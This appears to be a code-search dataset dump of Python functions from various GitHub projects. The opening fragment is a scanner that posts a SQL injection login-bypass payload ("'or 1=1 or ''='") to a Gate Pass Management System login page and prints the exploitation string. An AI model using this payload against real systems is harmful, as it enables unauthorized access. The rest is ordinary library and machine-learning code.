[ "def", "attack", "(", "URL", ")", ":", "print", "(", "'[+]开始检测-Gate_Pass_Management_System_login_SQL_Injection。[+]')", "", "url", "=", "URL", "+", "'/login-exec.php'", "data", "=", "{", "#'login': 'admin','password': '123456',", "'login'", ":", "r\"'or 1=1 or ''='\"", ",", "'password'", ":", "r\"'or 1=1 or ''='\"", ",", "'Submit'", ":", "'value'", ",", "}", "try", ":", "r", "=", "requests", ".", "post", "(", "url", ",", "data", "=", "data", ")", "if", "'Please check your username and password'", "in", "r", ".", "text", ":", "print", "(", "'[-]账户密码错误,绕过登录失败,不存在漏洞。')", "", "print", "(", "'检测页面:'+url)", "", "", "", "elif", "'Industronics Engineering'", "in", "r", ".", "text", ":", "print", "(", "'[+]绕过登录成功,存在sql注入漏洞。')", "", "print", "(", "'漏洞连接:'+url)", "", "", "", "print", "(", "\"利用方法:login='or 1=1 or ''='&password='or 1=1 or ''='&Submit=Login\")", "", "else", ":", "print", "(", "'[!]检测时发生错误,可能不存在漏洞页面。')", "", "except", ":", "print", "(", "'[!]连接端口时发生错误。')", "", "print", "(", "'[+]检测完成-Gate_Pass_Management_System_login_SQL_Injection。[+]')", "", "print", "(", "'\\n'", ")" ]
https://github.com/1120362990/vulnerability-list/blob/59a1b3f8f9c32ec2620b2953ab561b44a8e8dd95/gatepass_vuln/Gate_Pass_Management_System_login_SQL_Injection.py#L12-L34
ansible-community/ara
f366c9f9f2a06311dd67449f1124dca0674563c2
ara/server/wsgi.py
python
distributed_sqlite
(environ, start_response)
Custom WSGI application meant to work with ara.server.db.backends.distributed_sqlite in order to dynamically load different databases at runtime.
Custom WSGI application meant to work with ara.server.db.backends.distributed_sqlite in order to dynamically load different databases at runtime.
[ "Custom", "WSGI", "application", "meant", "to", "work", "with", "ara", ".", "server", ".", "db", ".", "backends", ".", "distributed_sqlite", "in", "order", "to", "dynamically", "load", "different", "databases", "at", "runtime", "." ]
def distributed_sqlite(environ, start_response): """ Custom WSGI application meant to work with ara.server.db.backends.distributed_sqlite in order to dynamically load different databases at runtime. """ # This endpoint is read only, do not accept write requests. if environ["REQUEST_METHOD"] not in ["GET", "HEAD", "OPTIONS"]: handle_405(start_response) script_name = get_script_name(environ) path_info = get_path_info(environ) from django.conf import settings # The root under which database files are expected root = settings.DISTRIBUTED_SQLITE_ROOT # The prefix after which everything should be delegated (ex: /ara-report) prefix = settings.DISTRIBUTED_SQLITE_PREFIX # Static assets should always be served by the regular app if path_info.startswith(settings.STATIC_URL): return application(environ, start_response) if prefix not in path_info: logger.warn("Ignoring request: URL does not contain delegated prefix (%s)" % prefix) return handle_404(start_response) # Slice path_info up until after the prefix to obtain the requested directory i = path_info.find(prefix) + len(prefix) fs_path = path_info[:i] # Make sure we aren't escaping outside the root and the directory exists db_dir = os.path.abspath(os.path.join(root, fs_path.lstrip("/"))) if not db_dir.startswith(root): logger.warn("Ignoring request: path is outside the root (%s)" % db_dir) return handle_404(start_response) elif not os.path.exists(db_dir): logger.warn("Ignoring request: database directory not found (%s)" % db_dir) return handle_404(start_response) # Find the database file and make sure it exists db_file = os.path.join(db_dir, "ansible.sqlite") if not os.path.exists(db_file): logger.warn("Ignoring request: database file not found (%s)" % db_file) return handle_404(start_response) # Tell Django about the new URLs it should be using environ["SCRIPT_NAME"] = script_name + fs_path environ["PATH_INFO"] = path_info[len(fs_path) :] # noqa: E203 # Store the path of the database in a thread so the distributed_sqlite # database backend can retrieve it. from ara.server.db.backends.distributed_sqlite.base import local_storage local_storage.db_path = db_file try: return application(environ, start_response) finally: del local_storage.db_path
[ "def", "distributed_sqlite", "(", "environ", ",", "start_response", ")", ":", "# This endpoint is read only, do not accept write requests.", "if", "environ", "[", "\"REQUEST_METHOD\"", "]", "not", "in", "[", "\"GET\"", ",", "\"HEAD\"", ",", "\"OPTIONS\"", "]", ":", "handle_405", "(", "start_response", ")", "script_name", "=", "get_script_name", "(", "environ", ")", "path_info", "=", "get_path_info", "(", "environ", ")", "from", "django", ".", "conf", "import", "settings", "# The root under which database files are expected", "root", "=", "settings", ".", "DISTRIBUTED_SQLITE_ROOT", "# The prefix after which everything should be delegated (ex: /ara-report)", "prefix", "=", "settings", ".", "DISTRIBUTED_SQLITE_PREFIX", "# Static assets should always be served by the regular app", "if", "path_info", ".", "startswith", "(", "settings", ".", "STATIC_URL", ")", ":", "return", "application", "(", "environ", ",", "start_response", ")", "if", "prefix", "not", "in", "path_info", ":", "logger", ".", "warn", "(", "\"Ignoring request: URL does not contain delegated prefix (%s)\"", "%", "prefix", ")", "return", "handle_404", "(", "start_response", ")", "# Slice path_info up until after the prefix to obtain the requested directory", "i", "=", "path_info", ".", "find", "(", "prefix", ")", "+", "len", "(", "prefix", ")", "fs_path", "=", "path_info", "[", ":", "i", "]", "# Make sure we aren't escaping outside the root and the directory exists", "db_dir", "=", "os", ".", "path", ".", "abspath", "(", "os", ".", "path", ".", "join", "(", "root", ",", "fs_path", ".", "lstrip", "(", "\"/\"", ")", ")", ")", "if", "not", "db_dir", ".", "startswith", "(", "root", ")", ":", "logger", ".", "warn", "(", "\"Ignoring request: path is outside the root (%s)\"", "%", "db_dir", ")", "return", "handle_404", "(", "start_response", ")", "elif", "not", "os", ".", "path", ".", "exists", "(", "db_dir", ")", ":", "logger", ".", "warn", "(", "\"Ignoring request: database directory not found (%s)\"", "%", "db_dir", ")", "return", "handle_404", "(", "start_response", ")", "# Find the database file and make sure it exists", "db_file", "=", "os", ".", "path", ".", "join", "(", "db_dir", ",", "\"ansible.sqlite\"", ")", "if", "not", "os", ".", "path", ".", "exists", "(", "db_file", ")", ":", "logger", ".", "warn", "(", "\"Ignoring request: database file not found (%s)\"", "%", "db_file", ")", "return", "handle_404", "(", "start_response", ")", "# Tell Django about the new URLs it should be using", "environ", "[", "\"SCRIPT_NAME\"", "]", "=", "script_name", "+", "fs_path", "environ", "[", "\"PATH_INFO\"", "]", "=", "path_info", "[", "len", "(", "fs_path", ")", ":", "]", "# noqa: E203", "# Store the path of the database in a thread so the distributed_sqlite", "# database backend can retrieve it.", "from", "ara", ".", "server", ".", "db", ".", "backends", ".", "distributed_sqlite", ".", "base", "import", "local_storage", "local_storage", ".", "db_path", "=", "db_file", "try", ":", "return", "application", "(", "environ", ",", "start_response", ")", "finally", ":", "del", "local_storage", ".", "db_path" ]
https://github.com/ansible-community/ara/blob/f366c9f9f2a06311dd67449f1124dca0674563c2/ara/server/wsgi.py#L47-L105
twschiller/open-synthesis
4c765c1105eea31a039dde25e53ee8d3612dd206
openach/templatetags/board_extras.py
python
url_replace
(request, field, value)
return dict_.urlencode()
Return a GET dictionary with field=value.
Return a GET dictionary with field=value.
[ "Return", "a", "GET", "dictionary", "with", "field", "=", "value", "." ]
def url_replace(request, field, value): """Return a GET dictionary with field=value.""" # taken from: https://stackoverflow.com/questions/2047622/how-to-paginate-django-with-other-get-variables dict_ = request.GET.copy() dict_[field] = value return dict_.urlencode()
[ "def", "url_replace", "(", "request", ",", "field", ",", "value", ")", ":", "# taken from: https://stackoverflow.com/questions/2047622/how-to-paginate-django-with-other-get-variables", "dict_", "=", "request", ".", "GET", ".", "copy", "(", ")", "dict_", "[", "field", "]", "=", "value", "return", "dict_", ".", "urlencode", "(", ")" ]
https://github.com/twschiller/open-synthesis/blob/4c765c1105eea31a039dde25e53ee8d3612dd206/openach/templatetags/board_extras.py#L225-L230
grnet/synnefo
d06ec8c7871092131cdaabf6b03ed0b504c93e43
astakosclient/astakosclient/__init__.py
python
AstakosClient.service_get_username
(self, uuid)
Return the displayName of a uuid using a service's token
Return the displayName of a uuid using a service's token
[ "Return", "the", "displayName", "of", "a", "uuid", "using", "a", "service", "s", "token" ]
def service_get_username(self, uuid): """Return the displayName of a uuid using a service's token""" check_input("service_get_username", self.logger, uuid=uuid) uuid_dict = self.service_get_usernames([uuid]) if uuid in uuid_dict: return uuid_dict.get(uuid) else: raise NoUserName(uuid)
[ "def", "service_get_username", "(", "self", ",", "uuid", ")", ":", "check_input", "(", "\"service_get_username\"", ",", "self", ".", "logger", ",", "uuid", "=", "uuid", ")", "uuid_dict", "=", "self", ".", "service_get_usernames", "(", "[", "uuid", "]", ")", "if", "uuid", "in", "uuid_dict", ":", "return", "uuid_dict", ".", "get", "(", "uuid", ")", "else", ":", "raise", "NoUserName", "(", "uuid", ")" ]
https://github.com/grnet/synnefo/blob/d06ec8c7871092131cdaabf6b03ed0b504c93e43/astakosclient/astakosclient/__init__.py#L374-L381
InQuest/omnibus
88dbf5d02f87eaa79a1cfc13d403cf854ee44c40
lib/modules/cybercure.py
python
Plugin.run
(self)
[]
def run(self): url = 'http://api.cybercure.ai/feed/search?value=%s' % self.artifact['name'] headers = {'User-Agent': 'OSINT Omnibus (https://github.com/InQuest/Omnibus)'} try: status, response = get(url, headers=headers) if status: results = response.json() self.artifact['data']['cybercure'] = results except Exception as err: warning('Caught exception in module (%s)' % str(err))
[ "def", "run", "(", "self", ")", ":", "url", "=", "'http://api.cybercure.ai/feed/search?value=%s'", "%", "self", ".", "artifact", "[", "'name'", "]", "headers", "=", "{", "'User-Agent'", ":", "'OSINT Omnibus (https://github.com/InQuest/Omnibus)'", "}", "try", ":", "status", ",", "response", "=", "get", "(", "url", ",", "headers", "=", "headers", ")", "if", "status", ":", "results", "=", "response", ".", "json", "(", ")", "self", ".", "artifact", "[", "'data'", "]", "[", "'cybercure'", "]", "=", "results", "except", "Exception", "as", "err", ":", "warning", "(", "'Caught exception in module (%s)'", "%", "str", "(", "err", ")", ")" ]
https://github.com/InQuest/omnibus/blob/88dbf5d02f87eaa79a1cfc13d403cf854ee44c40/lib/modules/cybercure.py#L18-L28
guildai/guildai
1665985a3d4d788efc1a3180ca51cc417f71ca78
guild/external/pip/_vendor/urllib3/fields.py
python
RequestField.make_multipart
(self, content_disposition=None, content_type=None, content_location=None)
Makes this request field into a multipart request field. This method overrides "Content-Disposition", "Content-Type" and "Content-Location" headers to the request parameter. :param content_type: The 'Content-Type' of the request body. :param content_location: The 'Content-Location' of the request body.
Makes this request field into a multipart request field.
[ "Makes", "this", "request", "field", "into", "a", "multipart", "request", "field", "." ]
def make_multipart(self, content_disposition=None, content_type=None, content_location=None): """ Makes this request field into a multipart request field. This method overrides "Content-Disposition", "Content-Type" and "Content-Location" headers to the request parameter. :param content_type: The 'Content-Type' of the request body. :param content_location: The 'Content-Location' of the request body. """ self.headers['Content-Disposition'] = content_disposition or 'form-data' self.headers['Content-Disposition'] += '; '.join([ '', self._render_parts( (('name', self._name), ('filename', self._filename)) ) ]) self.headers['Content-Type'] = content_type self.headers['Content-Location'] = content_location
[ "def", "make_multipart", "(", "self", ",", "content_disposition", "=", "None", ",", "content_type", "=", "None", ",", "content_location", "=", "None", ")", ":", "self", ".", "headers", "[", "'Content-Disposition'", "]", "=", "content_disposition", "or", "'form-data'", "self", ".", "headers", "[", "'Content-Disposition'", "]", "+=", "'; '", ".", "join", "(", "[", "''", ",", "self", ".", "_render_parts", "(", "(", "(", "'name'", ",", "self", ".", "_name", ")", ",", "(", "'filename'", ",", "self", ".", "_filename", ")", ")", ")", "]", ")", "self", ".", "headers", "[", "'Content-Type'", "]", "=", "content_type", "self", ".", "headers", "[", "'Content-Location'", "]", "=", "content_location" ]
https://github.com/guildai/guildai/blob/1665985a3d4d788efc1a3180ca51cc417f71ca78/guild/external/pip/_vendor/urllib3/fields.py#L157-L178
msr-fiddle/pipedream
7db6a1c3e64996d5b319faec6ca38cb31bfea1c4
runtime/communication.py
python
CommunicationHandler.start_helper_thread
(self, args_func, func, args_func_args, num_iterations)
Start passed-in func on a helper thread.
Start passed-in func on a helper thread.
[ "Start", "passed", "-", "in", "func", "on", "a", "helper", "thread", "." ]
def start_helper_thread(self, args_func, func, args_func_args, num_iterations): """ Start passed-in func on a helper thread. """ args_func_args += [num_iterations] args = args_func(*args_func_args) helper_thread = threading.Thread(target=func, args=args) helper_thread.start()
[ "def", "start_helper_thread", "(", "self", ",", "args_func", ",", "func", ",", "args_func_args", ",", "num_iterations", ")", ":", "args_func_args", "+=", "[", "num_iterations", "]", "args", "=", "args_func", "(", "*", "args_func_args", ")", "helper_thread", "=", "threading", ".", "Thread", "(", "target", "=", "func", ",", "args", "=", "args", ")", "helper_thread", ".", "start", "(", ")" ]
https://github.com/msr-fiddle/pipedream/blob/7db6a1c3e64996d5b319faec6ca38cb31bfea1c4/runtime/communication.py#L348-L356
PaddlePaddle/PaddleX
2bab73f81ab54e328204e7871e6ae4a82e719f5d
paddlex/ppcls/arch/backbone/model_zoo/swin_transformer.py
python
WindowAttention.forward
(self, x, mask=None)
return x
Args: x: input features with shape of (num_windows*B, N, C) mask: (0/-inf) mask with shape of (num_windows, Wh*Ww, Wh*Ww) or None
Args: x: input features with shape of (num_windows*B, N, C) mask: (0/-inf) mask with shape of (num_windows, Wh*Ww, Wh*Ww) or None
[ "Args", ":", "x", ":", "input", "features", "with", "shape", "of", "(", "num_windows", "*", "B", "N", "C", ")", "mask", ":", "(", "0", "/", "-", "inf", ")", "mask", "with", "shape", "of", "(", "num_windows", "Wh", "*", "Ww", "Wh", "*", "Ww", ")", "or", "None" ]
def forward(self, x, mask=None): """ Args: x: input features with shape of (num_windows*B, N, C) mask: (0/-inf) mask with shape of (num_windows, Wh*Ww, Wh*Ww) or None """ B_, N, C = x.shape qkv = self.qkv(x).reshape( [B_, N, 3, self.num_heads, C // self.num_heads]).transpose( [2, 0, 3, 1, 4]) q, k, v = qkv[0], qkv[1], qkv[2] q = q * self.scale attn = paddle.mm(q, k.transpose([0, 1, 3, 2])) index = self.relative_position_index.reshape([-1]) relative_position_bias = paddle.index_select( self.relative_position_bias_table, index) relative_position_bias = relative_position_bias.reshape([ self.window_size[0] * self.window_size[1], self.window_size[0] * self.window_size[1], -1 ]) # Wh*Ww,Wh*Ww,nH relative_position_bias = relative_position_bias.transpose( [2, 0, 1]) # nH, Wh*Ww, Wh*Ww attn = attn + relative_position_bias.unsqueeze(0) if mask is not None: nW = mask.shape[0] attn = attn.reshape([B_ // nW, nW, self.num_heads, N, N ]) + mask.unsqueeze(1).unsqueeze(0) attn = attn.reshape([-1, self.num_heads, N, N]) attn = self.softmax(attn) else: attn = self.softmax(attn) attn = self.attn_drop(attn) # x = (attn @ v).transpose(1, 2).reshape([B_, N, C]) x = paddle.mm(attn, v).transpose([0, 2, 1, 3]).reshape([B_, N, C]) x = self.proj(x) x = self.proj_drop(x) return x
[ "def", "forward", "(", "self", ",", "x", ",", "mask", "=", "None", ")", ":", "B_", ",", "N", ",", "C", "=", "x", ".", "shape", "qkv", "=", "self", ".", "qkv", "(", "x", ")", ".", "reshape", "(", "[", "B_", ",", "N", ",", "3", ",", "self", ".", "num_heads", ",", "C", "//", "self", ".", "num_heads", "]", ")", ".", "transpose", "(", "[", "2", ",", "0", ",", "3", ",", "1", ",", "4", "]", ")", "q", ",", "k", ",", "v", "=", "qkv", "[", "0", "]", ",", "qkv", "[", "1", "]", ",", "qkv", "[", "2", "]", "q", "=", "q", "*", "self", ".", "scale", "attn", "=", "paddle", ".", "mm", "(", "q", ",", "k", ".", "transpose", "(", "[", "0", ",", "1", ",", "3", ",", "2", "]", ")", ")", "index", "=", "self", ".", "relative_position_index", ".", "reshape", "(", "[", "-", "1", "]", ")", "relative_position_bias", "=", "paddle", ".", "index_select", "(", "self", ".", "relative_position_bias_table", ",", "index", ")", "relative_position_bias", "=", "relative_position_bias", ".", "reshape", "(", "[", "self", ".", "window_size", "[", "0", "]", "*", "self", ".", "window_size", "[", "1", "]", ",", "self", ".", "window_size", "[", "0", "]", "*", "self", ".", "window_size", "[", "1", "]", ",", "-", "1", "]", ")", "# Wh*Ww,Wh*Ww,nH", "relative_position_bias", "=", "relative_position_bias", ".", "transpose", "(", "[", "2", ",", "0", ",", "1", "]", ")", "# nH, Wh*Ww, Wh*Ww", "attn", "=", "attn", "+", "relative_position_bias", ".", "unsqueeze", "(", "0", ")", "if", "mask", "is", "not", "None", ":", "nW", "=", "mask", ".", "shape", "[", "0", "]", "attn", "=", "attn", ".", "reshape", "(", "[", "B_", "//", "nW", ",", "nW", ",", "self", ".", "num_heads", ",", "N", ",", "N", "]", ")", "+", "mask", ".", "unsqueeze", "(", "1", ")", ".", "unsqueeze", "(", "0", ")", "attn", "=", "attn", ".", "reshape", "(", "[", "-", "1", ",", "self", ".", "num_heads", ",", "N", ",", "N", "]", ")", "attn", "=", "self", ".", "softmax", "(", "attn", ")", "else", ":", "attn", "=", "self", ".", "softmax", "(", "attn", ")", "attn", "=", "self", ".", "attn_drop", "(", "attn", ")", "# x = (attn @ v).transpose(1, 2).reshape([B_, N, C])", "x", "=", "paddle", ".", "mm", "(", "attn", ",", "v", ")", ".", "transpose", "(", "[", "0", ",", "2", ",", "1", ",", "3", "]", ")", ".", "reshape", "(", "[", "B_", ",", "N", ",", "C", "]", ")", "x", "=", "self", ".", "proj", "(", "x", ")", "x", "=", "self", ".", "proj_drop", "(", "x", ")", "return", "x" ]
https://github.com/PaddlePaddle/PaddleX/blob/2bab73f81ab54e328204e7871e6ae4a82e719f5d/paddlex/ppcls/arch/backbone/model_zoo/swin_transformer.py#L170-L213
securityclippy/elasticintel
aa08d3e9f5ab1c000128e95161139ce97ff0e334
ingest_feed_lambda/numpy/lib/function_base.py
python
_update_dim_sizes
(dim_sizes, arg, core_dims)
Incrementally check and update core dimension sizes for a single argument. Arguments --------- dim_sizes : Dict[str, int] Sizes of existing core dimensions. Will be updated in-place. arg : ndarray Argument to examine. core_dims : Tuple[str, ...] Core dimensions for this argument.
Incrementally check and update core dimension sizes for a single argument.
[ "Incrementally", "check", "and", "update", "core", "dimension", "sizes", "for", "a", "single", "argument", "." ]
def _update_dim_sizes(dim_sizes, arg, core_dims): """ Incrementally check and update core dimension sizes for a single argument. Arguments --------- dim_sizes : Dict[str, int] Sizes of existing core dimensions. Will be updated in-place. arg : ndarray Argument to examine. core_dims : Tuple[str, ...] Core dimensions for this argument. """ if not core_dims: return num_core_dims = len(core_dims) if arg.ndim < num_core_dims: raise ValueError( '%d-dimensional argument does not have enough ' 'dimensions for all core dimensions %r' % (arg.ndim, core_dims)) core_shape = arg.shape[-num_core_dims:] for dim, size in zip(core_dims, core_shape): if dim in dim_sizes: if size != dim_sizes[dim]: raise ValueError( 'inconsistent size for core dimension %r: %r vs %r' % (dim, size, dim_sizes[dim])) else: dim_sizes[dim] = size
[ "def", "_update_dim_sizes", "(", "dim_sizes", ",", "arg", ",", "core_dims", ")", ":", "if", "not", "core_dims", ":", "return", "num_core_dims", "=", "len", "(", "core_dims", ")", "if", "arg", ".", "ndim", "<", "num_core_dims", ":", "raise", "ValueError", "(", "'%d-dimensional argument does not have enough '", "'dimensions for all core dimensions %r'", "%", "(", "arg", ".", "ndim", ",", "core_dims", ")", ")", "core_shape", "=", "arg", ".", "shape", "[", "-", "num_core_dims", ":", "]", "for", "dim", ",", "size", "in", "zip", "(", "core_dims", ",", "core_shape", ")", ":", "if", "dim", "in", "dim_sizes", ":", "if", "size", "!=", "dim_sizes", "[", "dim", "]", ":", "raise", "ValueError", "(", "'inconsistent size for core dimension %r: %r vs %r'", "%", "(", "dim", ",", "size", ",", "dim_sizes", "[", "dim", "]", ")", ")", "else", ":", "dim_sizes", "[", "dim", "]", "=", "size" ]
https://github.com/securityclippy/elasticintel/blob/aa08d3e9f5ab1c000128e95161139ce97ff0e334/ingest_feed_lambda/numpy/lib/function_base.py#L2450-L2481
django-nonrel/django-nonrel
4fbfe7344481a5eab8698f79207f09124310131b
django/core/cache/backends/base.py
python
BaseCache.decr
(self, key, delta=1, version=None)
return self.incr(key, -delta, version=version)
Subtract delta from value in the cache. If the key does not exist, raise a ValueError exception.
Subtract delta from value in the cache. If the key does not exist, raise a ValueError exception.
[ "Subtract", "delta", "from", "value", "in", "the", "cache", ".", "If", "the", "key", "does", "not", "exist", "raise", "a", "ValueError", "exception", "." ]
def decr(self, key, delta=1, version=None): """ Subtract delta from value in the cache. If the key does not exist, raise a ValueError exception. """ return self.incr(key, -delta, version=version)
[ "def", "decr", "(", "self", ",", "key", ",", "delta", "=", "1", ",", "version", "=", "None", ")", ":", "return", "self", ".", "incr", "(", "key", ",", "-", "delta", ",", "version", "=", "version", ")" ]
https://github.com/django-nonrel/django-nonrel/blob/4fbfe7344481a5eab8698f79207f09124310131b/django/core/cache/backends/base.py#L147-L152
tobegit3hub/deep_image_model
8a53edecd9e00678b278bb10f6fb4bdb1e4ee25e
java_predict_client/src/main/proto/tensorflow/contrib/tensor_forest/python/tensor_forest.py
python
ForestHParams.fill
(self)
return self
Intelligently sets any non-specific parameters.
Intelligently sets any non-specific parameters.
[ "Intelligently", "sets", "any", "non", "-", "specific", "parameters", "." ]
def fill(self): """Intelligently sets any non-specific parameters.""" # Fail fast if num_classes or num_features isn't set. _ = getattr(self, 'num_classes') _ = getattr(self, 'num_features') self.bagged_num_features = int(self.feature_bagging_fraction * self.num_features) self.bagged_features = None if self.feature_bagging_fraction < 1.0: self.bagged_features = [random.sample( range(self.num_features), self.bagged_num_features) for _ in range(self.num_trees)] self.regression = getattr(self, 'regression', False) # Num_outputs is the actual number of outputs (a single prediction for # classification, a N-dimenensional point for regression). self.num_outputs = self.num_classes if self.regression else 1 # Add an extra column to classes for storing counts, which is needed for # regression and avoids having to recompute sums for classification. self.num_output_columns = self.num_classes + 1 # The Random Forest literature recommends sqrt(# features) for # classification problems, and p/3 for regression problems. # TODO(thomaswc): Consider capping this for large number of features. self.num_splits_to_consider = ( self.num_splits_to_consider or max(10, int(math.ceil(math.sqrt(self.num_features))))) # max_fertile_nodes doesn't effect performance, only training speed. # We therefore set it primarily based upon space considerations. # Each fertile node takes up num_splits_to_consider times as much # as space as a non-fertile node. We want the fertile nodes to in # total only take up as much space as the non-fertile nodes, so num_fertile = int(math.ceil(self.max_nodes / self.num_splits_to_consider)) # But always use at least 1000 accumulate slots. num_fertile = max(num_fertile, 1000) self.max_fertile_nodes = self.max_fertile_nodes or num_fertile # But it also never needs to be larger than the number of leaves, # which is max_nodes / 2. self.max_fertile_nodes = min(self.max_fertile_nodes, int(math.ceil(self.max_nodes / 2.0))) # We have num_splits_to_consider slots to fill, and we want to spend # approximately split_after_samples samples initializing them. num_split_initializiations_per_input = max(1, int(math.floor( self.num_splits_to_consider / self.split_after_samples))) self.split_initializations_per_input = getattr( self, 'split_initializations_per_input', num_split_initializiations_per_input) # If base_random_seed is 0, the current time will be used to seed the # random number generators for each tree. If non-zero, the i-th tree # will be seeded with base_random_seed + i. self.base_random_seed = getattr(self, 'base_random_seed', 0) return self
[ "def", "fill", "(", "self", ")", ":", "# Fail fast if num_classes or num_features isn't set.", "_", "=", "getattr", "(", "self", ",", "'num_classes'", ")", "_", "=", "getattr", "(", "self", ",", "'num_features'", ")", "self", ".", "bagged_num_features", "=", "int", "(", "self", ".", "feature_bagging_fraction", "*", "self", ".", "num_features", ")", "self", ".", "bagged_features", "=", "None", "if", "self", ".", "feature_bagging_fraction", "<", "1.0", ":", "self", ".", "bagged_features", "=", "[", "random", ".", "sample", "(", "range", "(", "self", ".", "num_features", ")", ",", "self", ".", "bagged_num_features", ")", "for", "_", "in", "range", "(", "self", ".", "num_trees", ")", "]", "self", ".", "regression", "=", "getattr", "(", "self", ",", "'regression'", ",", "False", ")", "# Num_outputs is the actual number of outputs (a single prediction for", "# classification, a N-dimenensional point for regression).", "self", ".", "num_outputs", "=", "self", ".", "num_classes", "if", "self", ".", "regression", "else", "1", "# Add an extra column to classes for storing counts, which is needed for", "# regression and avoids having to recompute sums for classification.", "self", ".", "num_output_columns", "=", "self", ".", "num_classes", "+", "1", "# The Random Forest literature recommends sqrt(# features) for", "# classification problems, and p/3 for regression problems.", "# TODO(thomaswc): Consider capping this for large number of features.", "self", ".", "num_splits_to_consider", "=", "(", "self", ".", "num_splits_to_consider", "or", "max", "(", "10", ",", "int", "(", "math", ".", "ceil", "(", "math", ".", "sqrt", "(", "self", ".", "num_features", ")", ")", ")", ")", ")", "# max_fertile_nodes doesn't effect performance, only training speed.", "# We therefore set it primarily based upon space considerations.", "# Each fertile node takes up num_splits_to_consider times as much", "# as space as a non-fertile node. We want the fertile nodes to in", "# total only take up as much space as the non-fertile nodes, so", "num_fertile", "=", "int", "(", "math", ".", "ceil", "(", "self", ".", "max_nodes", "/", "self", ".", "num_splits_to_consider", ")", ")", "# But always use at least 1000 accumulate slots.", "num_fertile", "=", "max", "(", "num_fertile", ",", "1000", ")", "self", ".", "max_fertile_nodes", "=", "self", ".", "max_fertile_nodes", "or", "num_fertile", "# But it also never needs to be larger than the number of leaves,", "# which is max_nodes / 2.", "self", ".", "max_fertile_nodes", "=", "min", "(", "self", ".", "max_fertile_nodes", ",", "int", "(", "math", ".", "ceil", "(", "self", ".", "max_nodes", "/", "2.0", ")", ")", ")", "# We have num_splits_to_consider slots to fill, and we want to spend", "# approximately split_after_samples samples initializing them.", "num_split_initializiations_per_input", "=", "max", "(", "1", ",", "int", "(", "math", ".", "floor", "(", "self", ".", "num_splits_to_consider", "/", "self", ".", "split_after_samples", ")", ")", ")", "self", ".", "split_initializations_per_input", "=", "getattr", "(", "self", ",", "'split_initializations_per_input'", ",", "num_split_initializiations_per_input", ")", "# If base_random_seed is 0, the current time will be used to seed the", "# random number generators for each tree. If non-zero, the i-th tree", "# will be seeded with base_random_seed + i.", "self", ".", "base_random_seed", "=", "getattr", "(", "self", ",", "'base_random_seed'", ",", "0", ")", "return", "self" ]
https://github.com/tobegit3hub/deep_image_model/blob/8a53edecd9e00678b278bb10f6fb4bdb1e4ee25e/java_predict_client/src/main/proto/tensorflow/contrib/tensor_forest/python/tensor_forest.py#L89-L148
wucng/TensorExpand
4ea58f64f5c5082b278229b799c9f679536510b7
TensorExpand/图片项目/8、CIFAR-10/cifar10.py
python
load_training_data
()
return images, cls, one_hot_encoded(class_numbers=cls, num_classes=num_classes)
Load all the training-data for the CIFAR-10 data-set. The data-set is split into 5 data-files which are merged here. Returns the images, class-numbers and one-hot encoded class-labels.
Load all the training-data for the CIFAR-10 data-set. The data-set is split into 5 data-files which are merged here. Returns the images, class-numbers and one-hot encoded class-labels.
[ "Load", "all", "the", "training", "-", "data", "for", "the", "CIFAR", "-", "10", "data", "-", "set", ".", "The", "data", "-", "set", "is", "split", "into", "5", "data", "-", "files", "which", "are", "merged", "here", ".", "Returns", "the", "images", "class", "-", "numbers", "and", "one", "-", "hot", "encoded", "class", "-", "labels", "." ]
def load_training_data(): """ Load all the training-data for the CIFAR-10 data-set. The data-set is split into 5 data-files which are merged here. Returns the images, class-numbers and one-hot encoded class-labels. """ # Pre-allocate the arrays for the images and class-numbers for efficiency. images = np.zeros(shape=[_num_images_train, img_size, img_size, num_channels], dtype=float) cls = np.zeros(shape=[_num_images_train], dtype=int) # Begin-index for the current batch. begin = 0 # For each data-file. for i in range(_num_files_train): # Load the images and class-numbers from the data-file. images_batch, cls_batch = _load_data(filename="data_batch_" + str(i + 1)) # Number of images in this batch. num_images = len(images_batch) # End-index for the current batch. end = begin + num_images # Store the images into the array. images[begin:end, :] = images_batch # Store the class-numbers into the array. cls[begin:end] = cls_batch # The begin-index for the next batch is the current end-index. begin = end return images, cls, one_hot_encoded(class_numbers=cls, num_classes=num_classes)
[ "def", "load_training_data", "(", ")", ":", "# Pre-allocate the arrays for the images and class-numbers for efficiency.", "images", "=", "np", ".", "zeros", "(", "shape", "=", "[", "_num_images_train", ",", "img_size", ",", "img_size", ",", "num_channels", "]", ",", "dtype", "=", "float", ")", "cls", "=", "np", ".", "zeros", "(", "shape", "=", "[", "_num_images_train", "]", ",", "dtype", "=", "int", ")", "# Begin-index for the current batch.", "begin", "=", "0", "# For each data-file.", "for", "i", "in", "range", "(", "_num_files_train", ")", ":", "# Load the images and class-numbers from the data-file.", "images_batch", ",", "cls_batch", "=", "_load_data", "(", "filename", "=", "\"data_batch_\"", "+", "str", "(", "i", "+", "1", ")", ")", "# Number of images in this batch.", "num_images", "=", "len", "(", "images_batch", ")", "# End-index for the current batch.", "end", "=", "begin", "+", "num_images", "# Store the images into the array.", "images", "[", "begin", ":", "end", ",", ":", "]", "=", "images_batch", "# Store the class-numbers into the array.", "cls", "[", "begin", ":", "end", "]", "=", "cls_batch", "# The begin-index for the next batch is the current end-index.", "begin", "=", "end", "return", "images", ",", "cls", ",", "one_hot_encoded", "(", "class_numbers", "=", "cls", ",", "num_classes", "=", "num_classes", ")" ]
https://github.com/wucng/TensorExpand/blob/4ea58f64f5c5082b278229b799c9f679536510b7/TensorExpand/图片项目/8、CIFAR-10/cifar10.py#L183-L217
sagemath/sage
f9b2db94f675ff16963ccdefba4f1a3393b3fe0d
src/sage/knots/knotinfo.py
python
KnotInfoBase.is_almost_alternating
(self)
return knotinfo_bool(self[self.items.almost_alternating])
r""" Return whether ``self`` is almost alternating. EXAMPLES:: sage: from sage.knots.knotinfo import KnotInfo sage: KnotInfo.K5_2.is_almost_alternating() # optional - database_knotinfo False
r""" Return whether ``self`` is almost alternating.
[ "r", "Return", "whether", "self", "is", "almost", "alternating", "." ]
def is_almost_alternating(self): r""" Return whether ``self`` is almost alternating. EXAMPLES:: sage: from sage.knots.knotinfo import KnotInfo sage: KnotInfo.K5_2.is_almost_alternating() # optional - database_knotinfo False """ db._feature.require() # column not available in demo-version return knotinfo_bool(self[self.items.almost_alternating])
[ "def", "is_almost_alternating", "(", "self", ")", ":", "db", ".", "_feature", ".", "require", "(", ")", "# column not available in demo-version", "return", "knotinfo_bool", "(", "self", "[", "self", ".", "items", ".", "almost_alternating", "]", ")" ]
https://github.com/sagemath/sage/blob/f9b2db94f675ff16963ccdefba4f1a3393b3fe0d/src/sage/knots/knotinfo.py#L1024-L1035
